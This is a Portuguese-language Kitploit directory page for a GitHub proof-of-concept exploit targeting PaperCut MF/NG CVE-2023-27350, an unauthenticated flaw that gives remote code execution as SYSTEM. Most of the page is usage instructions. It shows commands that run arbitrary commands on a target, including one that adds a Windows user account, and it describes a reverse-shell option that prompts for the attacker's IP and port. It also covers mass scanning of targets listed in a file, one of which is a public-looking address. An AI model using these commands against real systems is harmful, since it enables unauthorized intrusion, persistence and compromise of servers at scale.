Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27350 — Exploit para Papercut CVE-2023-27350. [+] Shell reverso [+] Verificação em massa | Kitploit
Ferramentas/GitHubGitHub/adhikara13/cve-2023-27350
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Exploit para Papercut CVE-2023-27350. [+] Shell reverso [+] Verificação em massa

Ver Repositório
93há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-27350 Prova de Conceito do Exploit

Este é um exploit de Prova de Conceito (POC) para CVE-2023-27350, uma vulnerabilidade encontrada no PaperCut MF/NG que permite a um atacante não autenticado executar código arbitrário com privilégios de SYSTEM.

Requisitos

Antes de usar este exploit, certifique-se de ter instalado as seguintes bibliotecas:

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

Opções

  • -u, --url: A URL da aplicação PaperCut MF/NG alvo (ex., http://target-ip:9191).
  • -c, --command: O comando a ser executado no sistema alvo.
  • --reverse-shell: Use um payload de reverse shell para executar comandos no sistema alvo.
  • -f, --file: Verificar vários alvos a partir de um arquivo (ex., file.txt).

Exemplo

Executar Comando

Para executar um comando no sistema alvo, use a opção -c:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

Reverse Shell

Para usar um payload de reverse shell para executar comandos no sistema alvo, use a opção --reverse-shell. Você será solicitado a inserir seu endereço IP e número de porta:

root@kitploit:~
python exploit.py -u http://target-ip:9191 --reverse-shell
Enter your IP address: <attacker-ip>
Enter your port number: <port>

Verificação em Massa

Para verificar vários alvos a partir de um arquivo, use a opção -f. O formato do arquivo deve ser ip_address:porta:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

Formatando o file.txt

Ao usar a opção de verificação em massa com a entrada file.txt, certifique-se de que o conteúdo do arquivo está formatado corretamente.

Cada linha do arquivo deve conter o endereço IP e o número da porta de um alvo, separados por dois pontos :. Por exemplo:

root@kitploit:~
110.175.19.78:9191
110.175.19.78:80
192.168.1.1:8080

Certifique-se de que não há espaços extras ou caracteres entre o endereço IP, os dois pontos e o número da porta. Além disso, certifique-se de que cada linha contenha apenas um endereço IP e número de porta.

Créditos

Esta é uma versão fork do repositório horizon3ai/CVE-2023-27350. Todos os créditos pelo exploit original vão para os autores.

Baixar ferramenta